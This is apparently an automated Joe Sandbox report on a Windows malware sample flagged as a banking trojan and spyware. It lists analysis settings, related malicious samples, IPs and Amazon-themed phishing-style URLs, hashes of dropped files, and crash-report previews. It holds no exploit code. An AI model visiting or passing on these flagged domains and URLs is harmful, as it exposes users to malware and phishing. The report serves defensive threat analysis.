                                                                                                                                                                                                            178.162.203.226
                                                                                                                                                                                                            gatyfus.comGermany
                                                                                                                                                                                                            28753LEASEWEB-DE-FRA-10DEtrue
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1507126
Start date and time: 2024-09-08 08:57:44 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 16
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5AFlyarMds.exe
renamed because original name is a hash value
Original Sample Name: Virus.Hijack.ATA_virussign.com_fcf6de7351633752cf96e861d60b2a8c.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winEXE@7/35@2027/24
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 79
• Number of non-executed functions: 243
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.209.182, 2.23.209.179, 2.23.209.177, 2.23.209.158, 2.23.209.149, 2.23.209.150, 2.23.209.161, 2.23.209.176, 2.23.209.160, 2.23.209.183, 2.23.209.187, 2.23.209.130, 2.23.209.185, 2.23.209.189, 2.23.209.181, 20.42.73.29
• Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 5AFlyarMds.exe
Time      Type             Description
02:59:26  API Interceptor  24644x Sleep call for process: svchost.exe modified
02:59:39  API Interceptor  4x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            http://leostop.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.leostop.com/search/tsc.php?200=NTkyMjkyNTEx&21=OC40Ni4xMjMuMzM=&681=MTcyMTk2Nzk4MTgxODg2ZmRhZDJjNzU3NTZlMTc0NmFkMjA5N2NhNTYx&crc=688a5d6af653e3a6b7501c60b740173e6added63&cv=1
                                                                                                                                                                                                            4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                            • ww1.icodeps.com/?usid=27&utid=6773648594
                                                                                                                                                                                                            http://datingsitefree.pages.dev/link-2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.ngelits.com/search/tsc.php?200=NTY0Nzc0OTIz&21=OC40Ni4xMjMuMzM=&681=MTcyMTc3NTA4OTJjZTdkMmM1NjEwYTgyMzJjZDQwY2EzZjJmNzA0YTEy&crc=5d6b65933af518cdf4d15c16efb5151a23c299ab&cv=1
                                                                                                                                                                                                            zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.flu.cc/?usid=17&utid=
                                                                                                                                                                                                            Reporte Comercial.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.pinochoconciertos.co/search/tsc.php?200=NTcxMTM0OTU2&21=OC40Ni4xMjMuMzM=&681=MTcxOTU5ODQ3MjU1NDYzYjVjOGQ4NGY5ZTRmYjFjZTRiNzhkZjBlODAy&crc=4cd4c0d65f78dddfc0f42871994ccdfc14d83923&cv=1
                                                                                                                                                                                                            pk3hXijbfHZz69Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.fullpaw.com/cr12/?jBZHx=KneTJ&t8o4ntI=LwqQubUKlntmM2qOdJDn0X3laVPQjbtHetbt4FWlj/sojHk4CP5kJb8A6VBG+/aiG1Sf
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-101745.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-103277.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            v548OdIeBZ.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                            • 15.198.14.122
                                                                                                                                                                                                            https://amazon-102007.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-101490.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-101953.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-100887.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            AMAZON-AESUS2zYqUnx8qs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            QTCc6zXJy3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            https://amazon-104169.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 50.19.89.137
                                                                                                                                                                                                            https://amazon-103674.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 50.19.89.137
                                                                                                                                                                                                            https://amazon-103974.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 3.233.158.30
                                                                                                                                                                                                            https://conecctwvallete.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 52.200.196.77
                                                                                                                                                                                                            https://amazon-103093.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.235.101.7
                                                                                                                                                                                                            https://conecctwvallete.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 44.206.193.225
                                                                                                                                                                                                            https://amazon-102823.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.235.101.7
                                                                                                                                                                                                            https://amazon-104501.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 3.233.158.31
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):481
                                                                                                                                                                                                            Entropy (8bit):7.515128020783169
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NGjx1vBGFaAKSM9xELExl+g8XllLdIdiLuAJDCLf6L:MfvsFDKPnELESl2dzAJD4E
                                                                                                                                                                                                            MD5:2DFDCC1880C422772CB67B200D395C82
                                                                                                                                                                                                            SHA1:F5999AE27CDE7F72DF14B6C1C97B9AF8698615B3
                                                                                                                                                                                                            SHA-256:F5C4402D1A9267B173F96AA67BDADBAB16CC16049768C5644817FEAA63862D7F
                                                                                                                                                                                                            SHA-512:6D0B98CE04F6DC81FE801255DB4A231522B9E73BCC27F882509A35F52FC97C649F2B0DCB04E0C55EA33068235DBECAE58B4FBD73C77695C8E3BBD1B0F5095CAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1226
                                                                                                                                                                                                            Entropy (8bit):7.857422787626542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WfwNaWJxezuQj1kZ8l9KfPqiHsHGstk4qtrZyrTduF1Wk:QsS4QWJxez1Rg8yimstk4OrZsduh
                                                                                                                                                                                                            MD5:E3B2EBB89A4778A8AB8ECBCD02A5E96C
                                                                                                                                                                                                            SHA1:A11A07348EF33664E4F259733E07EE54EA2992D9
                                                                                                                                                                                                            SHA-256:022E2FF126CC9E2B20F9A54444C37DFF86A5C309FB2C5383E50381001147BCAC
                                                                                                                                                                                                            SHA-512:2F021C78A7E7BF8EAD518AA82697FBF7048A9871BB2BBB65F68A86C389603BBDC4C2D0FB222A11074ACE20DAD46B380D03D7A7BE4F360176224E29139259642D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25275
                                                                                                                                                                                                            Entropy (8bit):7.979791890880129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CARva/n308n02AARP+6VWq1iGSwUl52IBscal5Ymj9DETgx+2dVSuMvjUP8Z31W8:C4ak8nKaPP1ha5uvbY0H+UDMwPbBU
                                                                                                                                                                                                            MD5:587F7E1ABA635FF43C46A794050A001A
                                                                                                                                                                                                            SHA1:4A63E0CCD895E0AB907C117982976BB69C887E56
                                                                                                                                                                                                            SHA-256:6EBA9A77CBD3C682522A62FBF67F21C7112BD728C2693E6AD19CAFF87C61B433
                                                                                                                                                                                                            SHA-512:D822DC79D229BC9AD72AF8B456A82CBDBBE2DE2C702F181562E51E8758DEB42683905E107ABCB5BE30DC89064C90FA84605D583FEDC8DF7AF4D72FD559D088E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9331955324621825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:8XoeLIwO0BU/4gojRJkVzuiFgZ24IO8/kW:7Dw1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:BEE435A234ABCD767FF9CADA505BC027
                                                                                                                                                                                                            SHA1:2AE393A825B5646022025D4632BF210C7D44AA04
                                                                                                                                                                                                            SHA-256:13D2FB419978EEE03B92CEB2222A478F39B4EC1D1508A56F2C9E7CDD91AE02C2
                                                                                                                                                                                                            SHA-512:DD820E927D3505BCFE744B5451D4933DFF74102F91BF099D3F7B2AA0A05748A8C0487E9EA7FBE55D7454BC2656F0ED327F2F092C447DC50A4C638198D3525295
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:Version=1 EventType=APPCRASH EventTime=133702523580729286 ReportType=2 Consent=1 UploadTime=133702523592916713 ReportStatus=524384 ReportIdentifier=13316e58-efdf-4217-8ef0-a322975a41ab IntegratorReportIdentifier=595004b1-5f8d-4638-bc76-d4dc900531fa Wow64Host=34404 Wow64Guest=332 NsAppName=cUKxeliGgCix.exe AppSessionGuid=00001b40-0001-0014-79ca-1b88bc01db01 TargetAppId=W:0006e89571ad247d2d7b656323cb9491b8110000ffff!00005536b7532400baf27beb2bfd425159264ad71136!cUKxeliGgCix.exe Targe
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9402738305754652
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:iswoeLIPoO0BU/4gojRJk1zuiFgZ24IO8/k:FtDg1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:D8BC7EB3CF9329C116A931F76038EE7A
                                                                                                                                                                                                            SHA1:E5A428EBB166D982BB5B1A27EC68825F8B0684E7
                                                                                                                                                                                                            SHA-256:1383ACE8D0537132C171B79607FBC5F021DF0950A1FEA64435737B41CBA88128
                                                                                                                                                                                                            SHA-512:5B086C519F1E80A2C71D5A9FBDF9EDEBA09BD419B4626FCFE3904EB9EA04F18C7A3C3FB4776D0BE9FE43BE4FA47A9EE8335ECA00C1570D10415EE003B0169517
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:Version=1 EventType=APPCRASH EventTime=133702523572806366 ReportType=2 Consent=1 UploadTime=133702523587806290 ReportStatus=524384 ReportIdentifier=6670a2f9-3bc3-45bc-a1c4-002a2c6c0343 IntegratorReportIdentifier=3016fce5-4eb8-4417-846a-640f1988dae0 Wow64Host=34404 Wow64Guest=332 NsAppName=cUKxeliGgCix.exe AppSessionGuid=00001bb4-0001-0014-ecce-1c88bc01db01 TargetAppId=W:0006e89571ad247d2d7b656323cb9491b8110000ffff!00005536b7532400baf27beb2bfd425159264ad71136!cUKxeliGgCix.exe Targe
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9400947366579226
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:V7ZfoeLI8ZO0BU/4gojRJk1zuiFgZ24IO8/k:vwDq1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:BCC7178FEF00AFAA92394008BF5C9362
                                                                                                                                                                                                            SHA1:8D8537F88D1A0411B1B01108B87F48D73C6C71DC
                                                                                                                                                                                                            SHA-256:ECA8F5C6D1510F461FA5CB770A4BF52588914B4BE7FF1A72FC126D88C1D425DC
                                                                                                                                                                                                            SHA-512:29FCCE2EF66F515EC7F1A409521C91A99F04156E53F7A22F8BF6720BB78B812907FEA581FB71417913F777408175C7EDECC262D99D07D95F2229638FC2611E9C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:Version=1 EventType=APPCRASH EventTime=133702523571772797 ReportType=2 Consent=1 UploadTime=133702523587085297 ReportStatus=524384 ReportIdentifier=a3fa18c3-18b5-4b15-939b-b5b714903e7b IntegratorReportIdentifier=e9be757d-b0a2-4503-8097-35712fe7076f Wow64Host=34404 Wow64Guest=332 NsAppName=cUKxeliGgCix.exe AppSessionGuid=000019ec-0001-0014-43f6-1d88bc01db01 TargetAppId=W:0006e89571ad247d2d7b656323cb9491b8110000ffff!00005536b7532400baf27beb2bfd425159264ad71136!cUKxeliGgCix.exe Targe
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.93326350310142
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Nq3GoeLIhO0BU/4gojRJkVzuiFgZ24IO8/k:iDh1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:F02B3F7A2AC07A9AA9AB068B67014988
                                                                                                                                                                                                            SHA1:63A66DB9B2900CDB992A2AB7BC2DCEFB34C95561
                                                                                                                                                                                                            SHA-256:18A0BB4AC77778192C017FC286FD2A02E9EDD1FD2D8C1707A255D7D2CA159480
                                                                                                                                                                                                            SHA-512:9DC79C7A8D2863718DA711163CAA835E9035A69D8B1E314D9A86E3EEB69BC9E387F36AD1D5A7741EDFF63C3D2D46EE329E935D774D112808059923668B8A9F8F
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:Version=1 EventType=APPCRASH EventTime=133702523585000466 ReportType=2 Consent=1 UploadTime=133702523593281784 ReportStatus=524384 ReportIdentifier=ac889830-8329-45a0-86cd-7010f935e18e IntegratorReportIdentifier=aad6174d-86bd-4005-a641-0b8cb91819b4 Wow64Host=34404 Wow64Guest=332 NsAppName=cUKxeliGgCix.exe AppSessionGuid=00001aac-0001-0014-71c2-1a88bc01db01 TargetAppId=W:0006e89571ad247d2d7b656323cb9491b8110000ffff!00005536b7532400baf27beb2bfd425159264ad71136!cUKxeliGgCix.exe Targe
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:17 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):105056
                                                                                                                                                                                                            Entropy (8bit):1.6173935657638276
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RPKRS1XX2XsThPNADOK8JbXRi7VX0AsFGr+sKWiCruX0VFeJcG/c1MXU75wYRvia:IRwdThPG6zJbXKVoZsKFCaE4crVhi
                                                                                                                                                                                                            MD5:5EE269E3AEADEF4599FE677E73FEF669
                                                                                                                                                                                                            SHA1:C1CD01598DB64808B75EA8A815BB73BB5FC6DE51
                                                                                                                                                                                                            SHA-256:19A43C586215FFF1E0B4CA9167CAAAA03D92076CB5515A1FFE6B60936ABB8653
                                                                                                                                                                                                            SHA-512:5F092E30B6ED263AC879A72AC4E1F76202A214F6B6C5D3A8547463065DEB32C8AE53331ACBC735EBD6720B6FD8202D6DD5E0D95EC59D63140D893B5BC96A0F83
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:17 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):99226
                                                                                                                                                                                                            Entropy (8bit):1.9757782387734482
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HkRcAkHxAoz2+6/+opK+Ah4WtUqvs3FQq3Lyhz9ER:EoHKoz2+qpK+AhZaqvsehzg
                                                                                                                                                                                                            MD5:32CE1798BD32AA1D983F12BFE38E4CCD
                                                                                                                                                                                                            SHA1:6CEB35454F8FF418A3B1A882CAA3799BBF036AA2
                                                                                                                                                                                                            SHA-256:A0A4AE3EFB3761B8146B6E3932DF9EBA512A289EB4350E35DF3C730B0261128E
                                                                                                                                                                                                            SHA-512:D295B7301D560F16DADAF987640DA09E5523B65CE6320EABC4F8EC95E011F6A274E8867E445A1B36394CAEF1709CAB0BD400F60B18A3E6CC629DB08F353B47A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.705095879913702
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJLJ6p6Y9iSUONgmfKBprm89bTTsf0JAxm:R6lXJl6p6YoSUONgmfKDT4fs
                                                                                                                                                                                                            MD5:4D5C9EFA45693E3480955FCC4D9D37FE
                                                                                                                                                                                                            SHA1:4A61EF76308CDD0B8D0027B73A10332B244CC7F2
                                                                                                                                                                                                            SHA-256:1DD43765C880934A48FFD7B47A49643B029247DD252BE5879A3FBCEC077E2FD7
                                                                                                                                                                                                            SHA-512:014BED998B7977045537D27FF9B7B4C0B5989A1C166CB830AA509E35569B3A5E036B6D247FA43F546817F84CEBF148A7BF440A44FA2B8B075C0B378D48F53F0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6636</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.704969007959791
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJio6U6Y91SUONgmfKBprL89bTLsflvxm:R6lXJV6U6YvSUONgmfKQTQfC
                                                                                                                                                                                                            MD5:7078D4D241CAF3279708AB3693513DBD
                                                                                                                                                                                                            SHA1:A85283D876B5405D3E3AE08921FD5DC3EBB6AE54
                                                                                                                                                                                                            SHA-256:F01DA8F9436CDB010A9C6BCD65460357D19C3F767640AA15FD61520D67928103
                                                                                                                                                                                                            SHA-512:50BEB2C75A4ACB4130C2A5019969C1C00ED0982982738820B38BD3DB983CD6906356BF6118481EB56EFA042F123032D46D33E80868AD9DCA4099F044BF51ED16
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7092</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.502106831706027
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI9BeWpW8VY0Ym8M4JUqF8u+q8KpBz9/wd:uIjfBI7Df7VgJn59lwd
                                                                                                                                                                                                            MD5:E80ABDF9FB71A92B1E80DE824CCFD2DB
                                                                                                                                                                                                            SHA1:DAEAE2B14035449AFA21A07561D1E8287AFF7910
                                                                                                                                                                                                            SHA-256:774F8D7850310DC5D49E6304E3BAEA093B144F08438200CCE70B6DC3015922F5
                                                                                                                                                                                                            SHA-512:A1B2F762FD2189DB35C82014D9E5E9C766D23ADF8C326D3ECCD727CBADABEE089DDC994C7457890B780F6133250AFB0CA508FB01F6044ECABC539B34D89C1765
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.500012999999847
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI9BeWpW8VYoYm8M4JUqF7U+q8KQmABz9/DwMdd:uIjfBI7Df7VQJ+gmA9lLdd
                                                                                                                                                                                                            MD5:0758A8317E91CA85C1E35C8036BF5BF1
                                                                                                                                                                                                            SHA1:A4C1DBC0F9251786886054D3719DF8D3902A256B
                                                                                                                                                                                                            SHA-256:D2E30E6933973028649A3CE85A7DACF942F08D4B1D9BFBF9A879DEA615D4AB59
